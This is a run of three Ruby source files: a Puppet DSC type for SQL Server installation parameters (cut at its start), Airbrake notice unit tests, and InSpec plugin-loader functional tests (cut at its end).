False # Values: None newparam(:dsc_sourcecredential) do def mof_type; 'MSFT_Credential' end def mof_is_embedded?; true end desc "SourceCredential - Credential to be used to access SourcePath." validate do |value| unless value.kind_of?(Hash) fail("Invalid value '#{value}'. Should be a hash") end PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("SourceCredential", value) end end # Name: SuppressReboot # Type: boolean # IsMandatory: False # Values: None newparam(:dsc_suppressreboot) do def mof_type; 'boolean' end def mof_is_embedded?; false end desc "SuppressReboot - Suppress reboot." validate do |value| end newvalues(true, false) munge do |value| PuppetX::Dsc::TypeHelpers.munge_boolean(value.to_s) end end # Name: ForceReboot # Type: boolean # IsMandatory: False # Values: None newparam(:dsc_forcereboot) do def mof_type; 'boolean' end def mof_is_embedded?; false end desc "ForceReboot - Force reboot." validate do |value| end newvalues(true, false) munge do |value| PuppetX::Dsc::TypeHelpers.munge_boolean(value.to_s) end end # Name: Features # Type: string # IsMandatory: False # Values: None newparam(:dsc_features) do def mof_type; 'string' end def mof_is_embedded?; false end desc "Features - SQL features to be installed." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: InstanceName # Type: string # IsMandatory: True # Values: None newparam(:dsc_instancename) do def mof_type; 'string' end def mof_is_embedded?; false end desc "InstanceName - SQL instance to be installed." isrequired validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: InstanceID # Type: string # IsMandatory: False # Values: None newparam(:dsc_instanceid) do def mof_type; 'string' end def mof_is_embedded?; false end desc "InstanceID - SQL instance ID, if different from InstanceName." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: PID # Type: string # IsMandatory: False # Values: None newparam(:dsc_pid) do def mof_type; 'string' end def mof_is_embedded?; false end desc "PID - Product key for licensed installations." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: UpdateEnabled # Type: string # IsMandatory: False # Values: None newparam(:dsc_updateenabled) do def mof_type; 'string' end def mof_is_embedded?; false end desc "UpdateEnabled - Enabled updates during installation." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: UpdateSource # Type: string # IsMandatory: False # Values: None newparam(:dsc_updatesource) do def mof_type; 'string' end def mof_is_embedded?; false end desc "UpdateSource - Source of updates to be applied during installation." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SQMReporting # Type: string # IsMandatory: False # Values: None newparam(:dsc_sqmreporting) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SQMReporting - Enable customer experience reporting." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: ErrorReporting # Type: string # IsMandatory: False # Values: None newparam(:dsc_errorreporting) do def mof_type; 'string' end def mof_is_embedded?; false end desc "ErrorReporting - Enable error reporting." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: InstallSharedDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_installshareddir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "InstallSharedDir - Installation path for shared SQL files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: InstallSharedWOWDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_installsharedwowdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "InstallSharedWOWDir - Installation path for x86 shared SQL files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: InstanceDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_instancedir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "InstanceDir - Installation path for SQL instance files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SQLSvcAccount # Type: MSFT_Credential # IsMandatory: False # Values: None newparam(:dsc_sqlsvcaccount) do def mof_type; 'MSFT_Credential' end def mof_is_embedded?; true end desc "SQLSvcAccount - Service account for the SQL service." validate do |value| unless value.kind_of?(Hash) fail("Invalid value '#{value}'. Should be a hash") end PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("SQLSvcAccount", value) end end # Name: SQLSvcAccountUsername # Type: string # IsMandatory: False # Values: None newparam(:dsc_sqlsvcaccountusername) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SQLSvcAccountUsername - Output username for the SQL service." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: AgtSvcAccount # Type: MSFT_Credential # IsMandatory: False # Values: None newparam(:dsc_agtsvcaccount) do def mof_type; 'MSFT_Credential' end def mof_is_embedded?; true end desc "AgtSvcAccount - Service account for the SQL Agent service." validate do |value| unless value.kind_of?(Hash) fail("Invalid value '#{value}'. Should be a hash") end PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("AgtSvcAccount", value) end end # Name: AgtSvcAccountUsername # Type: string # IsMandatory: False # Values: None newparam(:dsc_agtsvcaccountusername) do def mof_type; 'string' end def mof_is_embedded?; false end desc "AgtSvcAccountUsername - Output username for the SQL Agent service." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SQLCollation # Type: string # IsMandatory: False # Values: None newparam(:dsc_sqlcollation) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SQLCollation - Collation for SQL." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SQLSysAdminAccounts # Type: string[] # IsMandatory: False # Values: None newparam(:dsc_sqlsysadminaccounts, :array_matching => :all) do def mof_type; 'string[]' end def mof_is_embedded?; false end desc "SQLSysAdminAccounts - Array of accounts to be made SQL administrators." validate do |value| unless value.kind_of?(Array) || value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string or an array of strings") end end munge do |value| Array(value) end end # Name: SecurityMode # Type: string # IsMandatory: False # Values: None newparam(:dsc_securitymode) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SecurityMode - Security mode." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SAPwd # Type: MSFT_Credential # IsMandatory: False # Values: None newparam(:dsc_sapwd) do def mof_type; 'MSFT_Credential' end def mof_is_embedded?; true end desc "SAPwd - SA password, if SecurityMode=SQL" validate do |value| unless value.kind_of?(Hash) fail("Invalid value '#{value}'. Should be a hash") end PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("SAPwd", value) end end # Name: InstallSQLDataDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_installsqldatadir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "InstallSQLDataDir - Root path for SQL database files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SQLUserDBDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_sqluserdbdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SQLUserDBDir - Path for SQL database files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SQLUserDBLogDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_sqluserdblogdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SQLUserDBLogDir - Path for SQL log files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SQLTempDBDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_sqltempdbdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SQLTempDBDir - Path for SQL TempDB files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SQLTempDBLogDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_sqltempdblogdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SQLTempDBLogDir - Path for SQL TempDB log files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SQLBackupDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_sqlbackupdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SQLBackupDir - Path for SQL backup files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: FTSvcAccount # Type: MSFT_Credential # IsMandatory: False # Values: None newparam(:dsc_ftsvcaccount) do def mof_type; 'MSFT_Credential' end def mof_is_embedded?; true end desc "FTSvcAccount - Service account for the Full Text service." validate do |value| unless value.kind_of?(Hash) fail("Invalid value '#{value}'. Should be a hash") end PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("FTSvcAccount", value) end end # Name: FTSvcAccountUsername # Type: string # IsMandatory: False # Values: None newparam(:dsc_ftsvcaccountusername) do def mof_type; 'string' end def mof_is_embedded?; false end desc "FTSvcAccountUsername - Output username for the Full Text service." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: RSSvcAccount # Type: MSFT_Credential # IsMandatory: False # Values: None newparam(:dsc_rssvcaccount) do def mof_type; 'MSFT_Credential' end def mof_is_embedded?; true end desc "RSSvcAccount - Service account for Reporting Services service." validate do |value| unless value.kind_of?(Hash) fail("Invalid value '#{value}'. Should be a hash") end PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("RSSvcAccount", value) end end # Name: RSSvcAccountUsername # Type: string # IsMandatory: False # Values: None newparam(:dsc_rssvcaccountusername) do def mof_type; 'string' end def mof_is_embedded?; false end desc "RSSvcAccountUsername - Output username for the Reporting Services service." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: ASSvcAccount # Type: MSFT_Credential # IsMandatory: False # Values: None newparam(:dsc_assvcaccount) do def mof_type; 'MSFT_Credential' end def mof_is_embedded?; true end desc "ASSvcAccount - Service account for Analysus Services service." validate do |value| unless value.kind_of?(Hash) fail("Invalid value '#{value}'. Should be a hash") end PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("ASSvcAccount", value) end end # Name: ASSvcAccountUsername # Type: string # IsMandatory: False # Values: None newparam(:dsc_assvcaccountusername) do def mof_type; 'string' end def mof_is_embedded?; false end desc "ASSvcAccountUsername - Output username for the Analysis Services service." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: ASCollation # Type: string # IsMandatory: False # Values: None newparam(:dsc_ascollation) do def mof_type; 'string' end def mof_is_embedded?; false end desc "ASCollation - Collation for Analysis Services." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: ASSysAdminAccounts # Type: string[] # IsMandatory: False # Values: None newparam(:dsc_assysadminaccounts, :array_matching => :all) do def mof_type; 'string[]' end def mof_is_embedded?; false end desc "ASSysAdminAccounts - Array of accounts to be made Analysis Services admins." validate do |value| unless value.kind_of?(Array) || value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string or an array of strings") end end munge do |value| Array(value) end end # Name: ASDataDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_asdatadir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "ASDataDir - Path for Analysis Services data files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: ASLogDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_aslogdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "ASLogDir - Path for Analysis Services log files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: ASBackupDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_asbackupdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "ASBackupDir - Path for Analysis Services backup files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: ASTempDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_astempdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "ASTempDir - Path for Analysis Services temp files." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: ASConfigDir # Type: string # IsMandatory: False # Values: None newparam(:dsc_asconfigdir) do def mof_type; 'string' end def mof_is_embedded?; false end desc "ASConfigDir - Path for Analysis Services config." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: ISSvcAccount # Type: MSFT_Credential # IsMandatory: False # Values: None newparam(:dsc_issvcaccount) do def mof_type; 'MSFT_Credential' end def mof_is_embedded?; true end desc "ISSvcAccount - Service account for Integration Services service." validate do |value| unless value.kind_of?(Hash) fail("Invalid value '#{value}'. Should be a hash") end PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("ISSvcAccount", value) end end # Name: ISSvcAccountUsername # Type: string # IsMandatory: False # Values: None newparam(:dsc_issvcaccountusername) do def mof_type; 'string' end def mof_is_embedded?; false end desc "ISSvcAccountUsername - Output username for the Integration Services service." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: BrowserSvcStartupType # Type: string # IsMandatory: False # Values: ["Automatic", "Disabled", "Manual"] newparam(:dsc_browsersvcstartuptype) do def mof_type; 'string' end def mof_is_embedded?; false end desc "BrowserSvcStartupType - Specifies the startup mode for SQL Server Browser service Valid values are Automatic, Disabled, Manual." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end unless ['Automatic', 'automatic', 'Disabled', 'disabled', 'Manual', 'manual'].include?(value) fail("Invalid value '#{value}'. Valid values are Automatic, Disabled, Manual") end end end def builddepends pending_relations = super() PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations) end end Puppet::Type.type(:dsc_xsqlserversetup).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10240.16384')) defaultfor :operatingsystem => :windows mk_resource_methods end
require File.expand_path '../helper', __FILE__ class NoticeTest < Test::Unit::TestCase include DefinesConstants def configure Airbrake::Configuration.new.tap do |config| config.api_key = 'abc123def456' end end def build_notice(args = {}) configuration = args.delete(:configuration) || configure Airbrake::Notice.new(configuration.merge(args)) end def stub_request(attrs = {}) stub('request', { :parameters => { 'one' => 'two' }, :protocol => 'http', :host => 'some.host', :request_uri => '/some/uri', :session => { :to_hash => { 'a' => 'b' } }, :env => { 'three' => 'four' } }.update(attrs)) end def assert_accepts_exception_attribute(attribute, args = {}, &block) exception = build_exception block ||= lambda { exception.send(attribute) } value = block.call(exception) notice_from_exception = build_notice(args.merge(:exception => exception)) assert_equal notice_from_exception.send(attribute), value, "#{attribute} was not correctly set from an exception" notice_from_hash = build_notice(args.merge(attribute => value)) assert_equal notice_from_hash.send(attribute), value, "#{attribute} was not correctly set from a hash" end def assert_valid_notice_document(document) xsd_path = URI(XSD_SCHEMA_PATH) schema = Nokogiri::XML::Schema.new(Net::HTTP.get(xsd_path)) errors = schema.validate(document) assert errors.empty?, errors.collect{|e| e.message }.join end def assert_valid_json(notice) json_schema = File.expand_path(File.join(File.dirname(__FILE__),"..", "resources", "airbrake_3_0.json")) errors = JSON::Validator.fully_validate(json_schema, notice) assert errors.empty?, errors.join end def build_backtrace_array ["app/models/user.rb:13:in `magic'", "app/controllers/users_controller.rb:8:in `index'"] end def hostname `hostname`.chomp end def user Struct.new(:email,:id,:name). new("[email protected]",1,"Anakin Skywalker") end should "call the cleaner on initialization" do cleaner = stub cleaner.expects(:clean).returns(stub(:parameters => {}, :cgi_data => {}, :session_data => {})) Airbrake::Notice.new(:cleaner => cleaner) end should "set the api key" do api_key = 'key' notice = build_notice(:api_key => api_key) assert_equal api_key, notice.api_key end should "accept a project root" do project_root = '/path/to/project' notice = build_notice(:project_root => project_root) assert_equal project_root, notice.project_root end should "accept a component" do assert_equal 'users_controller', build_notice(:component => 'users_controller').controller end should "alias the component as controller" do assert_equal 'users_controller', build_notice(:controller => 'users_controller').component assert_equal 'users_controller', build_notice(:component => 'users_controller').controller end should "accept a action" do assert_equal 'index', build_notice(:action => 'index').action end should "accept a url" do url = 'http://some.host/uri' notice = build_notice(:url => url) assert_equal url, notice.url end should "set the host name" do notice = build_notice assert_equal hostname, notice.hostname end should "accept a backtrace from an exception or hash" do array = ["user.rb:34:in `crazy'"] exception = build_exception exception.set_backtrace array backtrace = Airbrake::Backtrace.parse(array) notice_from_exception = build_notice(:exception => exception) assert_equal backtrace, notice_from_exception.backtrace, "backtrace was not correctly set from an exception" notice_from_hash = build_notice(:backtrace => array) assert_equal backtrace, notice_from_hash.backtrace, "backtrace was not correctly set from a hash" end should "accept user" do assert_equal user.id, build_notice(:user => user).user.id assert_equal user.email, build_notice(:user => user).user.email assert_equal user.name, build_notice(:user => user).user.name end should "pass its backtrace filters for parsing" do backtrace_array = ['my/file/backtrace:3'] exception = build_exception exception.set_backtrace(backtrace_array) Airbrake::Backtrace.expects(:parse).with(backtrace_array, {:filters => 'foo'}) Airbrake::Notice.new({:exception => exception, :backtrace_filters => 'foo'}) end should "set the error class from an exception or hash" do assert_accepts_exception_attribute :error_class do |exception| exception.class.name end end should "set the error message from an exception or hash" do assert_accepts_exception_attribute :error_message do |exception| "#{exception.class.name}: #{exception.message}" end end should "accept parameters from a request or hash" do parameters = { 'one' => 'two' } notice_from_hash = build_notice(:parameters => parameters) assert_equal notice_from_hash.parameters, parameters end should "accept session data from a session[:data] hash" do data = { 'one' => 'two' } notice = build_notice(:session => { :data => data }) assert_equal data, notice.session_data end should "accept session data from a session_data hash" do data = { 'one' => 'two' } notice = build_notice(:session_data => data) assert_equal data, notice.session_data end should "accept an environment name" do assert_equal 'development', build_notice(:environment_name => 'development').environment_name end should "accept CGI data from a hash" do data = { 'string' => 'value' } notice = build_notice(:cgi_data => data) assert_equal data, notice.cgi_data, "should take CGI data from a hash" end should "not crash without CGI data" do assert_nothing_raised do build_notice end end should "accept notifier information" do params = { :notifier_name => 'a name for a notifier', :notifier_version => '1.0.5', :notifier_url => 'http://notifiers.r.us/download' } notice = build_notice(params) assert_equal params[:notifier_name], notice.notifier_name assert_equal params[:notifier_version], notice.notifier_version assert_equal params[:notifier_url], notice.notifier_url end should "set sensible defaults without an exception" do backtrace = Airbrake::Backtrace.parse(build_backtrace_array) notice = build_notice(:backtrace => build_backtrace_array) assert_equal 'Notification', notice.error_message assert_array_starts_with backtrace.lines, notice.backtrace.lines assert_equal({}, notice.parameters) assert_equal({}, notice.session_data) end should "use the caller as the backtrace for an exception without a backtrace" do filters = Airbrake::Configuration.new.backtrace_filters backtrace = Airbrake::Backtrace.parse(caller, :filters => filters) notice = build_notice(:exception => StandardError.new('error'), :backtrace => nil) assert_array_starts_with backtrace.lines, notice.backtrace.lines end context "a Notice turned into JSON" do setup do @exception = build_exception @notice = build_notice({ :notifier_name => 'a name', :notifier_version => '1.2.3', :notifier_url => 'http://some.url/path', :exception => @exception, :controller => "controller", :action => "action", :url => "http://url.com", :parameters => { "paramskey" => "paramsvalue", "nestparentkey" => { "nestkey" => "nestvalue" } }, :session_data => { "sessionkey" => "sessionvalue" }, :cgi_data => { "cgikey" => "cgivalue" }, :project_root => "RAILS_ROOT", :environment_name => "RAILS_ENV" }) @json = @notice.to_json end should "validate against the JSON schema" do assert_valid_json @json end end context "a Notice turned into XML" do setup do Airbrake.configure do |config| config.api_key = "1234567890" end @exception = build_exception @notice = build_notice({ :notifier_name => 'a name', :notifier_version => '1.2.3', :notifier_url => 'http://some.url/path', :exception => @exception, :controller => "controller", :action => "action", :url => "http://url.com", :parameters => { "paramskey" => "paramsvalue", "nestparentkey" => { "nestkey" => "nestvalue" } }, :session_data => { "sessionkey" => "sessionvalue" }, :cgi_data => { "cgikey" => "cgivalue" }, :project_root => "RAILS_ROOT", :environment_name => "RAILS_ENV" }) @xml = @notice.to_xml @document = Nokogiri::XML::Document.parse(@xml) end should "validate against the XML schema" do assert_valid_notice_document @document end should "serialize a Notice to XML when sent #to_xml" do assert_valid_node(@document, "//api-key", @notice.api_key) assert_valid_node(@document, "//notifier/name", @notice.notifier_name) assert_valid_node(@document, "//notifier/version", @notice.notifier_version) assert_valid_node(@document, "//notifier/url", @notice.notifier_url) assert_valid_node(@document, "//error/class", @notice.error_class) assert_valid_node(@document, "//error/message", @notice.error_message) assert_valid_node(@document, "//error/backtrace/line/@number", @notice.backtrace.lines.first.number) assert_valid_node(@document, "//error/backtrace/line/@file", @notice.backtrace.lines.first.file) assert_valid_node(@document, "//error/backtrace/line/@method", @notice.backtrace.lines.first.method_name) assert_valid_node(@document, "//request/url", @notice.url) assert_valid_node(@document, "//request/component", @notice.controller) assert_valid_node(@document, "//request/action", @notice.action) assert_valid_node(@document, "//request/params/var/@key", "paramskey") assert_valid_node(@document, "//request/params/var", "paramsvalue") assert_valid_node(@document, "//request/params/var/@key", "nestparentkey") assert_valid_node(@document, "//request/params/var/var/@key", "nestkey") assert_valid_node(@document, "//request/params/var/var", "nestvalue") assert_valid_node(@document, "//request/session/var/@key", "sessionkey") assert_valid_node(@document, "//request/session/var", "sessionvalue") assert_valid_node(@document, "//request/cgi-data/var/@key", "cgikey") assert_valid_node(@document, "//request/cgi-data/var", "cgivalue") assert_valid_node(@document, "//server-environment/project-root", "RAILS_ROOT") assert_valid_node(@document, "//server-environment/environment-name", "RAILS_ENV") assert_valid_node(@document, "//server-environment/hostname", hostname) end end should "not send empty request data" do notice = build_notice assert_nil notice.url assert_nil notice.controller assert_nil notice.action xml = notice.to_xml document = Nokogiri::XML.parse(xml) assert_nil document.at('//request/url') assert_nil document.at('//request/component') assert_nil document.at('//request/action') assert_valid_notice_document document end %w(url controller action).each do |var| should "send a request if #{var} is present" do notice = build_notice(var.to_sym => 'value') xml = notice.to_xml document = Nokogiri::XML.parse(xml) assert_not_nil document.at('//request') end end %w(parameters cgi_data session_data).each do |var| should "send a request if #{var} is present" do notice = build_notice(var.to_sym => { 'key' => 'value' }) xml = notice.to_xml document = Nokogiri::XML.parse(xml) assert_not_nil document.at('//request') end end should "not ignore an exception not matching ignore filters" do notice = build_notice(:error_class => 'ArgumentError', :ignore => ['Argument'], :ignore_by_filters => [lambda { |n| false }]) assert !notice.ignore? end should "ignore an exception with a matching error class" do notice = build_notice(:error_class => 'ArgumentError', :ignore => [ArgumentError]) assert notice.ignore? end should "ignore an exception with a matching error class name" do notice = build_notice(:error_class => 'ArgumentError', :ignore => ['ArgumentError']) assert notice.ignore? end should "ignore an exception with a matching filter" do filter = lambda {|notice| notice.error_class == 'ArgumentError' } notice = build_notice(:error_class => 'ArgumentError', :ignore_by_filters => [filter]) assert notice.ignore? end should "not raise without an ignore list" do notice = build_notice(:ignore => nil, :ignore_by_filters => nil) assert_nothing_raised do notice.ignore? end end ignored_error_classes = Airbrake::Configuration::IGNORE_DEFAULT ignored_error_classes.each do |ignored_error_class| should "ignore #{ignored_error_class} error by default" do notice = build_notice(:error_class => ignored_error_class) assert notice.ignore? end end should "act like a hash" do notice = build_notice(:error_message => 'some message') assert_equal notice.error_message, notice[:error_message] end should "return params on notice[:request][:params]" do params = { 'one' => 'two' } notice = build_notice(:parameters => params) assert_equal params, notice[:request][:params] end should "ensure #to_hash is called on objects that support it" do assert_nothing_raised do build_notice(:session => { :object => stub(:to_hash => {}) }) end end should "ensure #to_ary is called on objects that support it" do assert_nothing_raised do build_notice(:session => { :object => stub(:to_ary => {}) }) end end should "extract data from a rack environment hash" do url = "https://subdomain.happylane.com:100/test/file.rb?var=value&var2=value2" parameters = { 'var' => 'value', 'var2' => 'value2' } env = Rack::MockRequest.env_for(url) notice = build_notice(:rack_env => env) assert_equal url, notice.url assert_equal parameters, notice.parameters assert_equal 'GET', notice.cgi_data['REQUEST_METHOD'] end should "show a nice warning when rack environment exceeds rack keyspace" do # simulate exception for too big query Rack::Request.any_instance.expects(:params).raises(RangeError.new("exceeded available parameter key space")) url = "https://subdomain.happylane.com:100/test/file.rb?var=x" env = Rack::MockRequest.env_for(url) notice = build_notice(:rack_env => env) assert_equal url, notice.url assert_equal({:message => "failed to call params on Rack::Request -- exceeded available parameter key space"}, notice.parameters) assert_equal 'GET', notice.cgi_data['REQUEST_METHOD'] end should "extract data from a rack environment hash with action_dispatch info" do params = { 'controller' => 'users', 'action' => 'index', 'id' => '7' } env = Rack::MockRequest.env_for('/', { 'action_dispatch.request.parameters' => params }) notice = build_notice(:rack_env => env) assert_equal params, notice.parameters assert_equal params['controller'], notice.component assert_equal params['action'], notice.action end should "extract session data from a rack environment" do session_data = { 'something' => 'some value' } env = Rack::MockRequest.env_for('/', 'rack.session' => session_data) notice = build_notice(:rack_env => env) assert_equal session_data, notice.session_data end should "prefer passed session data to rack session data" do session_data = { 'something' => 'some value' } env = Rack::MockRequest.env_for('/') notice = build_notice(:rack_env => env, :session_data => session_data) assert_equal session_data, notice.session_data end should "prefer passed error_message to exception message" do exception = build_exception notice = build_notice(:exception => exception,:error_message => "Random ponies") assert_equal "BacktracedException: Random ponies", notice.error_message end end
# Functional tests related to plugin facility require 'functional/helper' #=========================================================================================# # Loader Errors #=========================================================================================# describe 'plugin loader' do include FunctionalHelper it 'handles an unloadable plugin correctly' do outcome = inspec_with_env('version', INSPEC_CONFIG_DIR: File.join(config_dir_path, 'plugin_error_on_load')) outcome.exit_status.must_equal 2 outcome.stdout.must_include('ERROR', 'Have an error on stdout') outcome.stdout.must_include('Could not load plugin inspec-divide-by-zero', 'Name the plugin in the stdout error') outcome.stdout.wont_include('ZeroDivisionError', 'No stacktrace in error by default') outcome.stdout.must_include('Errors were encountered while loading plugins', 'Friendly message in error') outcome.stdout.must_include('Plugin name: inspec-divide-by-zero', 'Plugin named in error') outcome.stdout.must_include('divided by 0', 'Exception message in error') outcome = inspec_with_env('version --debug', INSPEC_CONFIG_DIR: File.join(config_dir_path, 'plugin_error_on_load')) outcome.exit_status.must_equal 2 outcome.stdout.must_include('ZeroDivisionError', 'Include stacktrace in error with --debug') end end #=========================================================================================# # Disabling Plugins #=========================================================================================# describe 'when disabling plugins' do include FunctionalHelper describe 'when disabling the core plugins' do it 'should not be able to use core-provided commands' do run_result = run_inspec_process('--disable-core-plugins habitat') run_result.stderr.must_include 'Could not find command "habitat".' # One might think that this should be code 2 (plugin error) # But because the core plugins are not loaded, 'habitat' is not # a known command, which makes it a usage error, code 1. run_result.exit_status.must_equal 1 end end describe 'when disabling the user plugins' do it 'should not be able to use user commands' do run_result = run_inspec_process('--disable-user-plugins meaningoflife answer', env: { INSPEC_CONFIG_DIR: File.join(config_dir_path, 'meaning_by_path') }) run_result.stderr.must_include 'Could not find command "meaningoflife"' run_result.exit_status.must_equal 1 end end end #=========================================================================================# # CliCommand plugin type #=========================================================================================# describe 'cli command plugins' do include FunctionalHelper it 'is able to respond to a plugin-based cli subcommand' do outcome = inspec_with_env('meaningoflife answer', INSPEC_CONFIG_DIR: File.join(config_dir_path, 'meaning_by_path')) outcome.stderr.wont_include 'Could not find command "meaningoflife"' outcome.stderr.must_equal '' outcome.stdout.must_equal '' outcome.exit_status.must_equal 42 end it 'is able to respond to [help subcommand] invocations' do outcome = inspec_with_env('help meaningoflife', INSPEC_CONFIG_DIR: File.join(config_dir_path, 'meaning_by_path')) outcome.exit_status.must_equal 0 outcome.stderr.must_equal '' outcome.stdout.must_include 'inspec meaningoflife answer' # Full text: # 'Exits immediately with an exit code reflecting the answer to life the universe, and everything.' # but Thor will ellipsify based on the terminal width outcome.stdout.must_include 'Exits immediately' end # This is an important test; usually CLI plugins are only activated when their name is present in ARGV it 'includes plugin-based cli commands in top-level help' do outcome = inspec_with_env('help', INSPEC_CONFIG_DIR: File.join(config_dir_path, 'meaning_by_path')) outcome.exit_status.must_equal 0 outcome.stdout.must_include 'inspec meaningoflife' end end #=========================================================================================# # inspec plugin command #=========================================================================================# # See lib/plugins/inspec-plugin-manager-cli/test #=========================================================================================# # Plugin Disable Messaging #=========================================================================================# describe 'disable plugin usage message integration' do include FunctionalHelper it "mentions the --disable-{user,core}-plugins options" do outcome = inspec('help') ['--disable-user-plugins', '--disable-core-plugins'].each do |option| outcome.stdout.must_include(option) end end end #=========================================================================================# # DSL Plugin Support #=========================================================================================# describe 'DSL plugin types support' do include PluginFunctionalHelper let(:fixture_path) { File.join(profile_path, 'dsl_plugins', 'controls', profile_file)} let(:dsl_plugin_path) { File.join(mock_path, 'plugins', 'inspec-dsl-test', 'lib', 'inspec-dsl-test.rb')} let(:run_result) { run_inspec_with_plugin("exec #{fixture_path}", plugin_path: dsl_plugin_path) } let(:json_result) { run_result.payload.json } describe 'outer profile dsl plugin type support' do let(:profile_file) { 'outer_profile_dsl.rb' } it 'works correctly with outer_profile dsl extensions' do run_result.stderr.must_equal '' # The outer_profile_dsl.rb file has control-01, then a call to favorite_grain # (which generates a control), then control-03. # If the plugin exploded, we'd see control-01 but not control-03 controls = json_result['profiles'][0]['controls'] controls.count.must_equal 3 # We expect the second controls id to be 'sorghum' # (this is the functionality of the outer_profile_dsl we installed) generated_control = json_result['profiles'][0]['controls'][1] generated_control['id'].must_equal 'sorghum' generated_control['results'][0]['status'].must_equal 'passed' end end describe 'control dsl plugin type support' do let(:profile_file) { 'control_dsl.rb' } it 'works correctly with control dsl extensions' do run_result.stderr.must_equal '' # The control_dsl.rb file has one control, with a describe-01, then a call to favorite_fruit, then describe-02 # If the plugin exploded, we'd see describe-01 but not describe-02 results = json_result['profiles'][0]['controls'][0]['results'] results.count.must_equal 2 # We expect the descriptions to include that the favorite fruit is banana # (this is the functionality of the control_dsl we installed) first_description_section = json_result['profiles'][0]['controls'][0]['descriptions'].first first_description_section.wont_be_nil first_description_section['label'].must_equal 'favorite_fruit' first_description_section['data'].must_equal 'Banana' end end describe 'describe dsl plugin type support' do let(:profile_file) { 'describe_dsl.rb' } it 'works correctly with describe dsl extensions' do run_result.stderr.must_equal '' # The describe_dsl.rb file has one control, with # describe-01, 